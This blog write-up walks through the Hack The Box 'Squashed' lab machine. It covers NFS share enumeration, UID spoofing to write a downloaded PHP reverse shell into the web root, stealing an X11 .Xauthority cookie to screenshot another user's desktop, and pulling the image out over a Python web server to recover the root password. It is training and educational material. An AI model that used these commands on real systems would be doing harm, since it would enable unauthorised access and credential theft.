Hack The Box Squashed Writeup

Posted on by Jonobi Musashi
Hack The Box Squashed

Hello world and welcome to haxez and my write-up for the Squashed machine. I’ve been getting back into doing Hack The Box machines again. I’ve started studying for the CPTS and the CBBH and thought I would do some boxes to complement the academy courses.

Information Gathering

Once I started the box I started enumerating it with Nmap. I targeted all ports, ran safe checks, and asked for version information. From the scan, results came back showing that ports 22, 80, 111, and 2049 were open. This suggested that the box was a web server with a publically exposed NFS service. 

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 09:55 GMT
Nmap scan report for 10.129.228.109
Host is up (0.022s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp    open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38714/udp6  mountd
|   100005  1,2,3      40865/tcp6  mountd
|   100005  1,2,3      48822/udp   mountd
|   100005  1,2,3      59769/tcp   mountd
|   100021  1,3,4      38567/tcp6  nlockmgr
|   100021  1,3,4      40531/tcp   nlockmgr
|   100021  1,3,4      46286/udp   nlockmgr
|   100021  1,3,4      53135/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40531/tcp open  nlockmgr 1-4 (RPC #100021)
41359/tcp open  mountd   1-3 (RPC #100005)
43719/tcp open  mountd   1-3 (RPC #100005)
59769/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
Port 80 and nfs are open.
Nmap Squashed
Nmap Squashed

Network File System Enumeration

Rather than brute forcing SSH or checking out the website on port 80, I decided to check out the Network File System service. To do this, I used the showmount command and pointed it to the IP address of the machine. The results from Showmount suggested that there were 2 exports. One for a user called ross and one for the webserver. 

┌─[joe@parrot]─[~]
└──╼ $sudo showmount -e 10.129.228.109
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *
NFS Showmount
NFS Showmount

Squashed Foothold

In order to get a foothold on Squashed, I mounted the /var/www/html NFS export. Then, I listed the parent directory and got the user ID 2017. 

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/var/www/html /mnt/www
┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 09:35 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 2017 www-data 4096 Mar  9 09:35 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

I created my own user with that user ID and switched to it. I moved into the html directory and used wget to download a PHP reverse shell from the pentestmonkey GitHub page. 

$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2023-03-09 09:39:25--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php                           100%[============================================>]   5.36K  --.-KB/s    in 0s      
2023-03-09 09:39:25 (57.3 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]

After changing the IP in the reverse shell, I set up a netcat listener and used curl to trigger the shell. 

┌─[joe@parrot]─[~]
└──╼ $sudo curl http://10.129.228.109/php-reverse-shell.php

This allowed me to get a shell on Squashed as the user alex. I upgraded my shell using the python stty trick and was able to capture the user flag.

Squashed User Flag
Squashed User Flag

Squashed Privilege Escalation

In order to elevate privileges on Squashed, I mounted the ross NFS export. Next, I created a user with the same user ID as ross, switched to it, and started looking around. 

┌─[joe@parrot]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/home/ross /mnt/ross

┌─[joe@parrot]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 10:11 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 htbs www-data 4096 Mar  9 10:10 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

┌─[joe@parrot]─[~]
└──╼ $sudo useradd htbross

┌─[joe@parrot]─[~]
└──╼ $sudo usermod -u 1001 htbross

┌─[joe@parrot]─[~]
└──╼ $sudo su htbross

$ ls -laSh /mnt/ross
total 64K
drwxr-xr-x 14 htbross scanner 4.0K Mar  9 09:19 .
drwx------ 11 htbross scanner 4.0K Oct 21 15:57 .cache
drwx------ 12 htbross scanner 4.0K Oct 21 15:57 .config
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Desktop
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Documents
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Downloads
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .gnupg
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .local
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Music
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Pictures
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Public
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Templates
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Videos
-rw-------  1 htbross scanner 2.5K Mar  9 09:19 .xsession-errors
-rw-------  1 htbross scanner 2.5K Dec 27 15:33 .xsession-errors.old
-rw-------  1 htbross scanner   57 Mar  9 09:19 .Xauthority
drwxr-xr-x  1 root    root      22 Mar  9 09:35 ..
lrwxrwxrwx  1 root    root       9 Oct 20 14:24 .bash_history -> /dev/null
lrwxrwxrwx  1 root    root       9 Oct 21 14:07 .viminfo -> /dev/null

At this point, I had no idea what I was looking for. Normally, I would just drop an SSH key in the authorized_keys file and SSH to the box. However, that wasn’t the way this box was intended to be completed. I resorted to looking at the official walkthrough and now the Xauthority file is a dead giveaway. You can look up what the file is for and what the presence of it suggests but to keep this short, it stores session tokens for X sessions. We can steal the token and use it to snoop on ross.

Cat the contents of the file and base64 encode it so it isn’t jibberish. Then save the output into the /tmp directory of Squashed via your reverse shell as alex. 

$ cat /mnt/ross/.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��Ȃ���).S��P���$ 

cat /mnt/ross/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC

$ echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC | base64 -d > /tmp/.Xauthority
Xauth
Xauth

Then, as alex we can do some more enumeration and find out what the configuration of ross’s session is. You can just press w apparently and it will show you. Had no idea. The more you know.

alex@squashed:/tmp$ w
w
10:26:43 up  1:07,  1 user,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               09:19    1:07m  9.11s  0.05s /usr/libexec/gnome-session-binary --systemd --session=gnome

Now, this allows us to start taking screenshots of the desktop with the following command… cool.

xwd -root -screen -silent -display :0 > /tmp/screen.xwd

Then, in order to access the screenshot we spin up a python web server and navigate to it and download it.

alex@squashed:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [09/Mar/2023 10:33:30] code 404, message File not found
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.126 - - [09/Mar/2023 10:33:58] "GET /screen.xwd HTTP/1.1" 200 -

Open the image, mine defaulted to gimp. I love gimp so no complaints. It looks like it is a password manager showing the root password.

Password Manager root
Password Manager root

Squashed root Flag

With the password for root we can simply switch to the root user and capture the root flag from the root directory. That completes the box. 

$ su root
Password: cahxxxxxxxi9A
whoami
root
cat /root/root.txt
692xxxxxxxxxxxxxxxxb159c

Conclusion

This was a fun box with an interesting privilege escalation technique. The method of completing it was fairly easy in terms of ability provided you understand the files you see. LinEnum didn’t flag the file as a method for privilege escalation so I wouldn’t have had a clue without the walkthrough. The great thing about Hack The Box machines is that everyone teaches you something new.